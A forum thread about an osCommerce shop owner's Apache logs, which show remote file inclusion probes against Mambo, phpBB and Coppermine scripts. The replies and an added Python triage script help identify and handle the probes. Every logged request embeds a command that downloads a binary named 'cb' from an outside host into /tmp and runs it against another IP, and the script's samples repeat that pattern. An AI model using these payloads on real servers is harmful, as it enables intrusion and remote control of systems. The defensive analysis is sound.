Is this a hacker's attempt on my catalog?


lerningkurv


Posted

This turned up in last night's logs.

It's got me a little worried, wondering what Apache returned in the two underlined entries!!!

 

213.133.109.66 - - [11/Dec/2005:19:58:52 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:54 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 200 13076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:55 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:56 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:57 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo| HTTP/1.1" 200 13076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:58 -0500] "GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo| HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:59 -0500] "GET /cvs/index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo| HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:59:00 -0500] "GET /admin_styles.phpadmin_styles.php?phpbb_root_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:59:02 -0500] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 339 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:59:03 -0500] "GET /Forums/admin_styles.phpadmin_styles.php?phpbb_root_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:59:04 -0500] "GET /forum/admin_styles.phpadmin_styles.php?phpbb_root_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:59:05 -0500] "GET /modules/coppermine/themes/default/theme.phptheme.php?THEME_DIR=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo| HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Posted

Looks like a scanner.

I get those all the time. People looking for security holes and unpatched software.

To be safe you should ban the IP via htaccess.

If the IP is from a country you do not service, ban the entire IP block.

Posted

It is an active exploit, some sort of worm maybe - it is downloading a file called 'cb' which is a Unix executable which then connects to another server (possibly DOS). Anyway, check /tmp for a file called cb (or ask your hosting provider to do it if you can't).

.shin
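A way to triage a log like the one in this thread, as an added example that is not part of the original posts: it flags requests that pass a remote URL as a query parameter (the `mosConfig_absolute_path`, `phpbb_root_path` and `THEME_DIR` pattern above) and separates 404 probes from requests a real script answered. The function name, field names and sample lines are assumptions; the sample lines are constructed with documentation IP ranges.

```python
import re
from urllib.parse import unquote

# Apache combined log format: client, timestamp, request line, status, size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"[A-Z]+ (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) ')
# A query parameter whose value is a remote URL (remote file inclusion probe).
REMOTE_PARAM_RE = re.compile(r'[?&]([\w\[\]]+)=((?:https?|ftp)://[^&\s]+)', re.I)
# Download-and-run shell tokens riding along in the same request.
SHELL_RE = re.compile(r'\b(?:wget|curl|chmod)\b', re.I)

def triage(lines):
    """Return one finding per request that passes a remote URL as a parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = unquote(m.group("target"))
        param = REMOTE_PARAM_RE.search(target)
        if not param:
            continue
        status = int(m.group("status"))
        findings.append({
            "ip": m.group("ip"),
            "path": target.split("?", 1)[0],
            "param": param.group(1),
            "shell": bool(SHELL_RE.search(target)),
            "status": status,
            # 404: the probed script does not exist on this host.
            # 2xx: a real script answered, so check it and the server by hand.
            "follow_up": 200 <= status < 300,
        })
    return findings

# Constructed sample lines (documentation IP ranges), shaped like the thread's log.
UA = '"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"'
PAYLOAD = "http://198.51.100.7/cm?&cmd=cd%20/tmp;wget%20198.51.100.7/cb;chmod%20744%20cb;echo|"
SAMPLE = [
    f'192.0.2.10 - - [11/Dec/2005:19:58:55 -0500] "GET /mambo/index2.php?GLOBALS=&mosConfig_absolute_path={PAYLOAD} HTTP/1.1" 404 302 {UA}',
    f'192.0.2.10 - - [11/Dec/2005:19:58:57 -0500] "GET /index.php?option=com_content&mosConfig_absolute_path={PAYLOAD} HTTP/1.1" 200 13076 {UA}',
    f'192.0.2.10 - - [11/Dec/2005:19:59:04 -0500] "GET /forum/admin_styles.php?phpbb_root_path={PAYLOAD} HTTP/1.1" 404 324 {UA}',
    f'192.0.2.44 - - [11/Dec/2005:20:01:12 -0500] "GET /index.php?cPath=3 HTTP/1.1" 200 9120 {UA}',
]

if __name__ == "__main__":
    for f in triage(SAMPLE):
        flag = "CHECK" if f["follow_up"] else "probe only"
        print(f'{f["ip"]} {f["status"]} {f["path"]} via {f["param"]} [{flag}]')
```

A 200 here only means an existing script answered the request, not that the inclusion succeeded; those are the entries to follow up with a check of /tmp and of whether that script uses the named parameter.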

Posted
It is an active exploit, some sort of worm maybe

How do you patch it / prevent it?

Posted
how do you patch it / prevent it?

 

Not sure... It doesn't seem to work on my osCommerce install. I wonder if it's a contribution or something. Google didn't seem to turn up anything either.

 

Wheee... Thanks for the info.

.shin
